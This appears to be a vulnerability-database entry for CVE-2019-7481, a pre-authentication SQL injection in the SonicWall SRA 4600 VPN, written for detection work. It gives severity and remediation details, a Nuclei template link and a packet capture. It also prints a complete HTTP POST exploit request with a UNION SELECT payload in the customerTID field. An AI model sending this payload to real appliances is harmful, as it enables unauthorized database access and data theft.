🔙 목록으로 돌아가기

CVE-2019-7481: SonicWall SRA 4600 VPN - SQL Injection

TitleSonicWall SRA 4600 VPN - SQL Injection
Author_darrenmartyn
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.
RemediationApply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.9438
CVE IDCVE-2019-7481
CWE IDCWE-89
Tags cve cve2019 sonicwall sqli kev vkev vuln

🔍 Vulnerability Description

The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.

🌐 HTTP Request

POST /cgi-bin/supportInstaller HTTP/1.1
Host: www.victim.com
User-Agent: MSIE
Connection: close
Content-Length: 83
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded

fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-7481.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-7481.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A